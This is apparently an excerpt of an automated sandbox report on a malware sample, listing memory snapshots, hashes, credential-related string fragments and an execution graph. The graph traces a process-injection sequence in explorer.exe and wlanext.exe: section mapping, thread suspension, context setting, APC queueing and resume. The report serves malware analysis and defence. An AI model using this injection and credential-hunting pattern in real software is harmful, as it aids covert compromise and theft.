                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction ID: f7b9c2a261c7c58230a0441a5f7382ff28cd952980d25fb1a3395721bd0b75d5
                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction Fuzzy Hash: 05316670218B484FCB55EF589498BAAB7E1FF98300F944A7D948ACB265DF30CD45CB52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: 34f1f53aa9a99bfb424cc7edec3018a343180864932e5229fdfb768732b2e93b
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: CE31B131614A0C8BDF45EFA8D8887EEB7E1FB5C214F40462AD49ED7250DE748A45CB89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: 55c0ed4fa599f61cf341e644bbb791ec4be139adfbb733060f58109522cc0d38
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 88219370614A4C8BDF05EFA8C8487EEBBE1FF5C214F40461AD49AD7260DE748A45CB89
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction ID: 9d297c85f1b5c35e74b550e1c410b41b4979fcba32c2810daedc0d16f5201bba
                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction Fuzzy Hash: C1216D70A24A0D9BDB04EFA8D4487EEBBF1FB1C304F504A2DD149E3610DB749951CB84
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction ID: 968b6d837669ab61504c421f9d4a5d88a6d71fbc3763739444a45a4fe2789962
                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction Fuzzy Hash: 69215C70A24A0D9FDB44EFA8D4487AEBAF1FB5C304F504A2ED149E3620DB749991CB84
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4458631165.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: auth$logi$pass$user
                                            • API String ID: 0-2393853802
                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction ID: 9b070593542476b801ad5a1023cb34196e2aa49af73013bb58860e9b72ab0bbc
                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction Fuzzy Hash: E521AC30624B0D8BCF05DF9998906AEB7E1EF88344F004A1AE44AEB258D7B0DD148BC2

                                            Execution Graph

                                            Execution Coverage:1.6%
                                            Dynamic/Decrypted Code Coverage:6.8%
                                            Signature Coverage:0%
                                            Total number of Nodes:620
                                            Total number of Limit Nodes:69
                                            execution_graph 112063 bcf08d 112066 bcb9d0 112063->112066 112067 bcb9f6 112066->112067 112074 bb9d40 112067->112074 112069 bcba02 112072 bcba26 112069->112072 112082 bb8f30 112069->112082 112120 bca6b0 112072->112120 112123 bb9c90 112074->112123 112076 bb9d4d 112077 bb9d54 112076->112077 112135 bb9c30 112076->112135 112077->112069 112083 bb8f57 112082->112083 112555 bbb1c0 112083->112555 112085 bb8f69 112559 bbaf10 112085->112559 112087 bb8f86 112095 bb8f8d 112087->112095 112630 bbae40 LdrLoadDll 112087->112630 112089 bb90f2 112089->112072 112091 bb8ffc 112575 bbf410 112091->112575 112093 bb9006 112093->112089 112094 bcbf90 2 API calls 112093->112094 112096 bb902a 112094->112096 112095->112089 112563 bbf380 112095->112563 112097 bcbf90 2 API calls 112096->112097 112098 bb903b 112097->112098 112099 bcbf90 2 API calls 112098->112099 112100 bb904c 112099->112100 112587 bbca90 112100->112587 112102 bb9059 112103 bc4a50 8 API calls 112102->112103 112104 bb9066 112103->112104 112105 bc4a50 8 API calls 112104->112105 112106 bb9077 112105->112106 112107 bb90a5 112106->112107 112108 bb9084 112106->112108 112110 bc4a50 8 API calls 112107->112110 112597 bbd620 112108->112597 112116 bb90c1 112110->112116 112112 bb90e9 112114 bb8d00 23 API calls 112112->112114 112114->112089 112115 bb9092 112613 bb8d00 112115->112613 112116->112112 112631 bbd6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 112116->112631 112121 bcaf60 LdrLoadDll 112120->112121 112122 bca6cf 112121->112122 112154 bc8bc0 112123->112154 112127 bb9cb6 112127->112076 112128 bb9cac 112128->112127 112161 bcb2b0 112128->112161 112130 bb9cf3 112130->112127 112172 bb9ab0 112130->112172 112132 bb9d13 112178 bb9620 LdrLoadDll 112132->112178 112134 bb9d25 112134->112076 112530 bcb5a0 112135->112530 112138 bcb5a0 LdrLoadDll 112139 bb9c5b 112138->112139 112140 bcb5a0 LdrLoadDll 112139->112140 112141 bb9c71 112140->112141 112142 bbf180 112141->112142 112143 bbf199 
112142->112143 112538 bbb040 112143->112538 112145 bbf1ac 112542 bca1e0 112145->112542 112149 bbf1d2 112150 bbf1fd 112149->112150 112548 bca260 112149->112548 112152 bca490 2 API calls 112150->112152 112153 bb9d65 112152->112153 112153->112069 112155 bc8bcf 112154->112155 112179 bc4e50 112155->112179 112157 bb9ca3 112158 bc8a70 112157->112158 112185 bca600 112158->112185 112162 bcb2c9 112161->112162 112192 bc4a50 112162->112192 112164 bcb2e1 112165 bcb2ea 112164->112165 112231 bcb0f0 112164->112231 112165->112130 112167 bcb2fe 112167->112165 112249 bc9f00 112167->112249 112508 bb7ea0 112172->112508 112174 bb9ad1 112174->112132 112175 bb9aca 112175->112174 112521 bb8160 112175->112521 112178->112134 112180 bc4e6a 112179->112180 112181 bc4e5e 112179->112181 112180->112157 112181->112180 112184 bc52d0 LdrLoadDll 112181->112184 112183 bc4fbc 112183->112157 112184->112183 112186 bc8a85 112185->112186 112188 bcaf60 112185->112188 112186->112128 112189 bcaf70 112188->112189 112191 bcaf92 112188->112191 112190 bc4e50 LdrLoadDll 112189->112190 112190->112191 112191->112186 112193 bc4d85 112192->112193 112203 bc4a64 112192->112203 112193->112164 112196 bc4b7d 112196->112164 112197 bc4b90 112260 bca360 112197->112260 112198 bc4b73 112317 bca460 LdrLoadDll 112198->112317 112201 bc4bb7 112202 bcbdc0 2 API calls 112201->112202 112206 bc4bc3 112202->112206 112203->112193 112257 bc9c50 112203->112257 112204 bc4d49 112207 bca490 2 API calls 112204->112207 112205 bc4d5f 112326 bc4790 LdrLoadDll NtReadFile NtClose 112205->112326 112206->112196 112206->112204 112206->112205 112211 bc4c52 112206->112211 112208 bc4d50 112207->112208 112208->112164 112210 bc4d72 112210->112164 112212 bc4cb9 112211->112212 112214 bc4c61 112211->112214 112212->112204 112213 bc4ccc 112212->112213 112319 bca2e0 112213->112319 112216 bc4c7a 112214->112216 112217 bc4c66 112214->112217 112220 bc4c7f 112216->112220 112221 bc4c97 112216->112221 112318 bc4650 LdrLoadDll NtClose LdrInitializeThunk 
LdrInitializeThunk 112217->112318 112263 bc46f0 112220->112263 112221->112208 112275 bc4410 112221->112275 112223 bc4c70 112223->112164 112225 bc4c8d 112225->112164 112227 bc4d2c 112323 bca490 112227->112323 112228 bc4caf 112228->112164 112230 bc4d38 112230->112164 112232 bcb101 112231->112232 112233 bcb113 112232->112233 112345 bcbd40 112232->112345 112233->112167 112235 bcb134 112348 bc4070 112235->112348 112237 bcb180 112237->112167 112238 bcb157 112238->112237 112239 bc4070 3 API calls 112238->112239 112241 bcb179 112239->112241 112241->112237 112380 bc5390 112241->112380 112242 bcb20a 112243 bcb21a 112242->112243 112474 bcaf00 LdrLoadDll 112242->112474 112390 bcad70 112243->112390 112246 bcb248 112469 bc9ec0 112246->112469 112250 bc9f1c 112249->112250 112251 bcaf60 LdrLoadDll 112249->112251 112502 3632c0a 112250->112502 112251->112250 112252 bc9f37 112254 bcbdc0 112252->112254 112255 bcb359 112254->112255 112505 bca670 112254->112505 112255->112130 112258 bcaf60 LdrLoadDll 112257->112258 112259 bc4b44 112258->112259 112259->112196 112259->112197 112259->112198 112261 bcaf60 LdrLoadDll 112260->112261 112262 bca37c NtCreateFile 112261->112262 112262->112201 112264 bc470c 112263->112264 112265 bca2e0 LdrLoadDll 112264->112265 112266 bc472d 112265->112266 112267 bc4748 112266->112267 112268 bc4734 112266->112268 112270 bca490 2 API calls 112267->112270 112269 bca490 2 API calls 112268->112269 112271 bc473d 112269->112271 112272 bc4751 112270->112272 112271->112225 112327 bcbfd0 LdrLoadDll RtlAllocateHeap 112272->112327 112274 bc475c 112274->112225 112276 bc448e 112275->112276 112277 bc445b 112275->112277 112279 bc45d9 112276->112279 112283 bc44aa 112276->112283 112278 bca2e0 LdrLoadDll 112277->112278 112280 bc4476 112278->112280 112281 bca2e0 LdrLoadDll 112279->112281 112282 bca490 2 API calls 112280->112282 112286 bc45f4 112281->112286 112284 bc447f 112282->112284 112285 bca2e0 LdrLoadDll 112283->112285 112284->112228 112287 bc44c5 112285->112287 112341 bca320 
LdrLoadDll 112286->112341 112289 bc44cc 112287->112289 112290 bc44e1 112287->112290 112294 bca490 2 API calls 112289->112294 112291 bc44fc 112290->112291 112292 bc44e6 112290->112292 112303 bc4501 112291->112303 112328 bcbf90 112291->112328 112296 bca490 2 API calls 112292->112296 112293 bc462e 112297 bca490 2 API calls 112293->112297 112295 bc44d5 112294->112295 112295->112228 112299 bc44ef 112296->112299 112298 bc4639 112297->112298 112298->112228 112299->112228 112302 bc4567 112304 bc457e 112302->112304 112340 bca2a0 LdrLoadDll 112302->112340 112310 bc4513 112303->112310 112332 bca410 112303->112332 112306 bc459a 112304->112306 112307 bc4585 112304->112307 112309 bca490 2 API calls 112306->112309 112308 bca490 2 API calls 112307->112308 112308->112310 112311 bc45a3 112309->112311 112310->112228 112312 bc45cf 112311->112312 112335 bcbb90 112311->112335 112312->112228 112314 bc45ba 112315 bcbdc0 2 API calls 112314->112315 112316 bc45c3 112315->112316 112316->112228 112317->112196 112318->112223 112320 bcaf60 LdrLoadDll 112319->112320 112321 bc4d14 112320->112321 112322 bca320 LdrLoadDll 112321->112322 112322->112227 112324 bcaf60 LdrLoadDll 112323->112324 112325 bca4ac NtClose 112324->112325 112325->112230 112326->112210 112327->112274 112329 bcbfa3 112328->112329 112342 bca630 112329->112342 112331 bcbfa8 112331->112303 112333 bcaf60 LdrLoadDll 112332->112333 112334 bca42c NtReadFile 112333->112334 112334->112302 112336 bcbb9d 112335->112336 112337 bcbbb4 112335->112337 112336->112337 112338 bcbf90 2 API calls 112336->112338 112337->112314 112339 bcbbcb 112338->112339 112339->112314 112340->112304 112341->112293 112343 bcaf60 LdrLoadDll 112342->112343 112344 bca64c RtlAllocateHeap 112343->112344 112344->112331 112475 bca540 112345->112475 112347 bcbd6d 112347->112235 112349 bc4081 112348->112349 112350 bc4089 112348->112350 112349->112238 112351 bc435c 112350->112351 112478 bccf30 112350->112478 112351->112238 112353 bc40dd 112354 bccf30 2 API calls 
112353->112354 112357 bc40e8 112354->112357 112355 bc4136 112358 bccf30 2 API calls 112355->112358 112357->112355 112359 bcd060 3 API calls 112357->112359 112489 bccfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 112357->112489 112361 bc414a 112358->112361 112359->112357 112360 bc41a7 112362 bccf30 2 API calls 112360->112362 112361->112360 112483 bcd060 112361->112483 112363 bc41bd 112362->112363 112365 bc41fa 112363->112365 112367 bcd060 3 API calls 112363->112367 112366 bccf30 2 API calls 112365->112366 112368 bc4205 112366->112368 112367->112363 112369 bcd060 3 API calls 112368->112369 112376 bc423f 112368->112376 112369->112368 112371 bc4334 112491 bccf90 LdrLoadDll RtlFreeHeap 112371->112491 112373 bc433e 112492 bccf90 LdrLoadDll RtlFreeHeap 112373->112492 112375 bc4348 112493 bccf90 LdrLoadDll RtlFreeHeap 112375->112493 112490 bccf90 LdrLoadDll RtlFreeHeap 112376->112490 112378 bc4352 112494 bccf90 LdrLoadDll RtlFreeHeap 112378->112494 112381 bc53a1 112380->112381 112382 bc4a50 8 API calls 112381->112382 112384 bc53b7 112382->112384 112383 bc540a 112383->112242 112384->112383 112385 bc5405 112384->112385 112386 bc53f2 112384->112386 112388 bcbdc0 2 API calls 112385->112388 112387 bcbdc0 2 API calls 112386->112387 112389 bc53f7 112387->112389 112388->112383 112389->112242 112495 bcac30 112390->112495 112393 bcac30 LdrLoadDll 112394 bcad8d 112393->112394 112395 bcac30 LdrLoadDll 112394->112395 112396 bcad96 112395->112396 112397 bcac30 LdrLoadDll 112396->112397 112398 bcad9f 112397->112398 112399 bcac30 LdrLoadDll 112398->112399 112400 bcada8 112399->112400 112401 bcac30 LdrLoadDll 112400->112401 112402 bcadb1 112401->112402 112403 bcac30 LdrLoadDll 112402->112403 112404 bcadbd 112403->112404 112405 bcac30 LdrLoadDll 112404->112405 112406 bcadc6 112405->112406 112407 bcac30 LdrLoadDll 112406->112407 112408 bcadcf 112407->112408 112409 bcac30 LdrLoadDll 112408->112409 112410 bcadd8 112409->112410 112411 bcac30 LdrLoadDll 112410->112411 112412 bcade1 112411->112412 
112413 bcac30 LdrLoadDll 112412->112413 112414 bcadea 112413->112414 112415 bcac30 LdrLoadDll 112414->112415 112416 bcadf6 112415->112416 112417 bcac30 LdrLoadDll 112416->112417 112418 bcadff 112417->112418 112419 bcac30 LdrLoadDll 112418->112419 112420 bcae08 112419->112420 112421 bcac30 LdrLoadDll 112420->112421 112422 bcae11 112421->112422 112423 bcac30 LdrLoadDll 112422->112423 112424 bcae1a 112423->112424 112425 bcac30 LdrLoadDll 112424->112425 112426 bcae23 112425->112426 112427 bcac30 LdrLoadDll 112426->112427 112428 bcae2f 112427->112428 112429 bcac30 LdrLoadDll 112428->112429 112430 bcae38 112429->112430 112431 bcac30 LdrLoadDll 112430->112431 112432 bcae41 112431->112432 112433 bcac30 LdrLoadDll 112432->112433 112434 bcae4a 112433->112434 112435 bcac30 LdrLoadDll 112434->112435 112436 bcae53 112435->112436 112437 bcac30 LdrLoadDll 112436->112437 112438 bcae5c 112437->112438 112439 bcac30 LdrLoadDll 112438->112439 112440 bcae68 112439->112440 112441 bcac30 LdrLoadDll 112440->112441 112442 bcae71 112441->112442 112443 bcac30 LdrLoadDll 112442->112443 112444 bcae7a 112443->112444 112445 bcac30 LdrLoadDll 112444->112445 112446 bcae83 112445->112446 112447 bcac30 LdrLoadDll 112446->112447 112448 bcae8c 112447->112448 112449 bcac30 LdrLoadDll 112448->112449 112450 bcae95 112449->112450 112451 bcac30 LdrLoadDll 112450->112451 112452 bcaea1 112451->112452 112453 bcac30 LdrLoadDll 112452->112453 112454 bcaeaa 112453->112454 112455 bcac30 LdrLoadDll 112454->112455 112456 bcaeb3 112455->112456 112457 bcac30 LdrLoadDll 112456->112457 112458 bcaebc 112457->112458 112459 bcac30 LdrLoadDll 112458->112459 112460 bcaec5 112459->112460 112461 bcac30 LdrLoadDll 112460->112461 112462 bcaece 112461->112462 112463 bcac30 LdrLoadDll 112462->112463 112464 bcaeda 112463->112464 112465 bcac30 LdrLoadDll 112464->112465 112466 bcaee3 112465->112466 112467 bcac30 LdrLoadDll 112466->112467 112468 bcaeec 112467->112468 112468->112246 112470 bcaf60 LdrLoadDll 112469->112470 112471 
bc9edc 112470->112471 112501 3632df0 LdrInitializeThunk 112471->112501 112472 bc9ef3 112472->112167 112474->112243 112476 bca55c NtAllocateVirtualMemory 112475->112476 112477 bcaf60 LdrLoadDll 112475->112477 112476->112347 112477->112476 112479 bccf46 112478->112479 112480 bccf40 112478->112480 112481 bcbf90 2 API calls 112479->112481 112480->112353 112482 bccf6c 112481->112482 112482->112353 112484 bccfd0 112483->112484 112485 bcbf90 2 API calls 112484->112485 112488 bcd02d 112484->112488 112486 bcd00a 112485->112486 112487 bcbdc0 2 API calls 112486->112487 112487->112488 112488->112361 112489->112357 112490->112371 112491->112373 112492->112375 112493->112378 112494->112351 112496 bcac4b 112495->112496 112497 bc4e50 LdrLoadDll 112496->112497 112498 bcac6b 112497->112498 112499 bc4e50 LdrLoadDll 112498->112499 112500 bcad17 112498->112500 112499->112500 112500->112393 112501->112472 112503 3632c11 112502->112503 112504 3632c1f LdrInitializeThunk 112502->112504 112503->112252 112504->112252 112506 bcaf60 LdrLoadDll 112505->112506 112507 bca68c RtlFreeHeap 112506->112507 112507->112255 112509 bb7eab 112508->112509 112510 bb7eb0 112508->112510 112509->112175 112511 bcbd40 2 API calls 112510->112511 112514 bb7ed5 112511->112514 112512 bb7f38 112512->112175 112513 bc9ec0 2 API calls 112513->112514 112514->112512 112514->112513 112515 bb7f3e 112514->112515 112519 bcbd40 2 API calls 112514->112519 112524 bca5c0 112514->112524 112517 bb7f64 112515->112517 112518 bca5c0 2 API calls 112515->112518 112517->112175 112520 bb7f55 112518->112520 112519->112514 112520->112175 112522 bca5c0 2 API calls 112521->112522 112523 bb817e 112522->112523 112523->112132 112525 bca5dc 112524->112525 112526 bcaf60 LdrLoadDll 112524->112526 112529 3632c70 LdrInitializeThunk 112525->112529 112526->112525 112527 bca5f3 112527->112514 112529->112527 112531 bcb5c3 112530->112531 112534 bbacf0 112531->112534 112535 bbad14 112534->112535 112536 bbad50 LdrLoadDll 112535->112536 112537 bb9c4a 
112535->112537 112536->112537 112537->112138 112540 bbb063 112538->112540 112539 bbb0e0 112539->112145 112540->112539 112553 bc9c90 LdrLoadDll 112540->112553 112543 bcaf60 LdrLoadDll 112542->112543 112544 bbf1bb 112543->112544 112544->112153 112545 bca7d0 112544->112545 112546 bcaf60 LdrLoadDll 112545->112546 112547 bca7ef LookupPrivilegeValueW 112546->112547 112547->112149 112549 bcaf60 LdrLoadDll 112548->112549 112550 bca27c 112549->112550 112554 3632ea0 LdrInitializeThunk 112550->112554 112551 bca29b 112551->112150 112553->112539 112554->112551 112556 bbb1f0 112555->112556 112557 bbb040 LdrLoadDll 112556->112557 112558 bbb204 112557->112558 112558->112085 112560 bbaf34 112559->112560 112632 bc9c90 LdrLoadDll 112560->112632 112562 bbaf6e 112562->112087 112564 bbf3ac 112563->112564 112565 bbb1c0 LdrLoadDll 112564->112565 112566 bbf3be 112565->112566 112633 bbf290 112566->112633 112569 bbf3d9 112571 bbf3e4 112569->112571 112573 bca490 2 API calls 112569->112573 112570 bbf3f1 112572 bbf402 112570->112572 112574 bca490 2 API calls 112570->112574 112571->112091 112572->112091 112573->112571 112574->112572 112576 bbf43c 112575->112576 112652 bbb2b0 112576->112652 112578 bbf44e 112579 bbf290 3 API calls 112578->112579 112580 bbf45f 112579->112580 112581 bbf469 112580->112581 112582 bbf481 112580->112582 112583 bca490 2 API calls 112581->112583 112584 bbf474 112581->112584 112585 bca490 2 API calls 112582->112585 112586 bbf492 112582->112586 112583->112584 112584->112093 112585->112586 112586->112093 112588 bbcaa6 112587->112588 112589 bbcab0 112587->112589 112588->112102 112590 bbaf10 LdrLoadDll 112589->112590 112591 bbcb4e 112590->112591 112592 bbcb74 112591->112592 112593 bbb040 LdrLoadDll 112591->112593 112592->112102 112594 bbcb90 112593->112594 112595 bc4a50 8 API calls 112594->112595 112596 bbcbe5 112595->112596 112596->112102 112598 bbd646 112597->112598 112599 bbb040 LdrLoadDll 112598->112599 112600 bbd65a 112599->112600 112656 bbd310 112600->112656 112602 
bb908b 112603 bbcc00 112602->112603 112604 bbcc26 112603->112604 112605 bbb040 LdrLoadDll 112604->112605 112606 bbcca9 112604->112606 112605->112606 112607 bbb040 LdrLoadDll 112606->112607 112608 bbcd16 112607->112608 112609 bbaf10 LdrLoadDll 112608->112609 112610 bbcd7f 112609->112610 112611 bbb040 LdrLoadDll 112610->112611 112612 bbce2f 112611->112612 112612->112115 112616 bb8d14 112613->112616 112685 bbf6d0 112613->112685 112615 bb8f25 112615->112072 112616->112615 112690 bc43a0 112616->112690 112618 bb8d70 112618->112615 112693 bb8ab0 112618->112693 112621 bccf30 2 API calls 112622 bb8db2 112621->112622 112623 bcd060 3 API calls 112622->112623 112627 bb8dc7 112623->112627 112624 bb7ea0 4 API calls 112624->112627 112627->112615 112627->112624 112628 bbc7b0 18 API calls 112627->112628 112629 bb8160 2 API calls 112627->112629 112698 bbf670 112627->112698 112702 bbf080 21 API calls 112627->112702 112628->112627 112629->112627 112630->112095 112631->112112 112632->112562 112634 bbf2aa 112633->112634 112642 bbf360 112633->112642 112635 bbb040 LdrLoadDll 112634->112635 112636 bbf2cc 112635->112636 112643 bc9f40 112636->112643 112638 bbf30e 112646 bc9f80 112638->112646 112641 bca490 2 API calls 112641->112642 112642->112569 112642->112570 112644 bcaf60 LdrLoadDll 112643->112644 112645 bc9f5c 112644->112645 112645->112638 112647 bcaf60 LdrLoadDll 112646->112647 112648 bc9f9c 112647->112648 112649 bbf354 112648->112649 112651 36335c0 LdrInitializeThunk 112648->112651 112649->112641 112651->112649 112653 bbb2d7 112652->112653 112654 bbb040 LdrLoadDll 112653->112654 112655 bbb313 112654->112655 112655->112578 112657 bbd327 112656->112657 112665 bbf710 112657->112665 112661 bbd39b 112662 bbd3a2 112661->112662 112676 bca2a0 LdrLoadDll 112661->112676 112662->112602 112664 bbd3b5 112664->112602 112666 bbf735 112665->112666 112677 bb81a0 112666->112677 112668 bbd36f 112673 bca6e0 112668->112673 112669 bc4a50 8 API calls 112671 bbf759 112669->112671 112671->112668 112671->112669 
112672 bcbdc0 2 API calls 112671->112672 112684 bbf550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 112671->112684 112672->112671 112674 bcaf60 LdrLoadDll 112673->112674 112675 bca6ff CreateProcessInternalW 112674->112675 112675->112661 112676->112664 112678 bb829f 112677->112678 112679 bb81b5 112677->112679 112678->112671 112679->112678 112680 bc4a50 8 API calls 112679->112680 112681 bb8222 112680->112681 112682 bcbdc0 2 API calls 112681->112682 112683 bb8249 112681->112683 112682->112683 112683->112671 112684->112671 112686 bc4e50 LdrLoadDll 112685->112686 112687 bbf6ef 112686->112687 112688 bbf6fd 112687->112688 112689 bbf6f6 SetErrorMode 112687->112689 112688->112616 112689->112688 112703 bbf4a0 112690->112703 112692 bc43c6 112692->112618 112694 bcbd40 2 API calls 112693->112694 112697 bb8ad5 112694->112697 112695 bb8cea 112695->112621 112697->112695 112722 bc9880 112697->112722 112699 bbf683 112698->112699 112770 bc9e90 112699->112770 112702->112627 112704 bbf4bd 112703->112704 112710 bc9fc0 112704->112710 112707 bbf505 112707->112692 112711 bcaf60 LdrLoadDll 112710->112711 112712 bc9fdc 112711->112712 112720 3632f30 LdrInitializeThunk 112712->112720 112713 bbf4fe 112713->112707 112715 bca010 112713->112715 112716 bcaf60 LdrLoadDll 112715->112716 112717 bca02c 112716->112717 112721 3632d10 LdrInitializeThunk 112717->112721 112718 bbf52e 112718->112692 112720->112713 112721->112718 112723 bcbf90 2 API calls 112722->112723 112724 bc9897 112723->112724 112743 bb9310 112724->112743 112726 bc98b2 112727 bc98d9 112726->112727 112728 bc98f0 112726->112728 112729 bcbdc0 2 API calls 112727->112729 112730 bcbd40 2 API calls 112728->112730 112731 bc98e6 112729->112731 112732 bc992a 112730->112732 112731->112695 112733 bcbd40 2 API calls 112732->112733 112734 bc9943 112733->112734 112739 bc9be4 112734->112739 112749 bcbd80 LdrLoadDll 112734->112749 112736 bc9bc9 112737 bc9bd0 112736->112737 112736->112739 112738 bcbdc0 2 API calls 112737->112738 112740 bc9bda 
112738->112740 112741 bcbdc0 2 API calls 112739->112741 112740->112695 112742 bc9c39 112741->112742 112742->112695 112744 bb9335 112743->112744 112745 bbacf0 LdrLoadDll 112744->112745 112746 bb9368 112745->112746 112748 bb938d 112746->112748 112750 bbcf20 112746->112750 112748->112726 112749->112736 112751 bbcf4c 112750->112751 112752 bca1e0 LdrLoadDll 112751->112752 112753 bbcf65 112752->112753 112754 bbcf6c 112753->112754 112761 bca220 112753->112761 112754->112748 112758 bbcfa7 112759 bca490 2 API calls 112758->112759 112760 bbcfca 112759->112760 112760->112748 112762 bcaf60 LdrLoadDll 112761->112762 112763 bca23c 112762->112763 112769 3632ca0 LdrInitializeThunk 112763->112769 112764 bbcf8f 112764->112754 112766 bca810 112764->112766 112767 bcaf60 LdrLoadDll 112766->112767 112768 bca82f 112767->112768 112768->112758 112769->112764 112771 bcaf60 LdrLoadDll 112770->112771 112772 bc9eac 112771->112772 112775 3632dd0 LdrInitializeThunk 112772->112775 112773 bbf6ae 112773->112627 112775->112773 112779 3632ad0 LdrInitializeThunk 112780 bc9080 112781 bcbd40 2 API calls 112780->112781 112783 bc90bb 112781->112783 112782 bc919c 112783->112782 112784 bbacf0 LdrLoadDll 112783->112784 112785 bc90f1 112784->112785 112786 bc4e50 LdrLoadDll 112785->112786 112788 bc910d 112786->112788 112787 bc9120 Sleep 112787->112788 112788->112782 112788->112787 112791 bc8ca0 LdrLoadDll 112788->112791 112792 bc8eb0 LdrLoadDll 112788->112792 112791->112788 112792->112788 112793 34acb84 112796 34aa042 112793->112796 112795 34acba5 112798 34aa06b 112796->112798 112797 34aa56c 112797->112795 112798->112797 112799 34aa182 NtQueryInformationProcess 112798->112799 112801 34aa1ba 112799->112801 112800 34aa1ef 112800->112795 112801->112800 112802 34aa2db 112801->112802 112803 34aa290 112801->112803 112804 34aa2fc NtSuspendThread 112802->112804 112825 34a9de2 NtCreateSection NtMapViewOfSection NtClose 112803->112825 112806 34aa30d 112804->112806 112808 34aa331 112804->112808 112806->112795 112807 
34aa2cf 112807->112795 112810 34aa412 112808->112810 112816 34a9bb2 112808->112816 112811 34aa531 112810->112811 112813 34aa4a6 NtSetContextThread 112810->112813 112812 34aa552 NtResumeThread 112811->112812 112812->112797 112815 34aa4bd 112813->112815 112814 34aa51c RtlQueueApcWow64Thread 112814->112811 112815->112811 112815->112814 112817 34a9bf7 112816->112817 112818 34a9c66 NtCreateSection 112817->112818 112819 34a9d4e 112818->112819 112820 34a9ca0 112818->112820 112819->112810 112821 34a9cc1 NtMapViewOfSection 112820->112821 112821->112819 112822 34a9d0c 112821->112822 112822->112819 112823 34a9d88 112822->112823 112824 34a9dc5 NtClose 112823->112824 112824->112810 112825->112807

                                            Control-flow Graph

                                            APIs
                                            • NtQueryInformationProcess.NTDLL ref: 034AA19F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450245257.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_34a0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InformationProcessQuery
                                            • String ID: 0
                                            • API String ID: 1778838933-4108050209
                                            • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                            • Instruction ID: f93ec44b854da4b565d50fc6efa6858ec79237c83b4feab378a2e281f8302df2
                                            • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                            • Instruction Fuzzy Hash: 12F12174918A8C8FDBA5EF69C894AEEB7E0FFA8304F40462ED44ADB250DF349541CB45

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
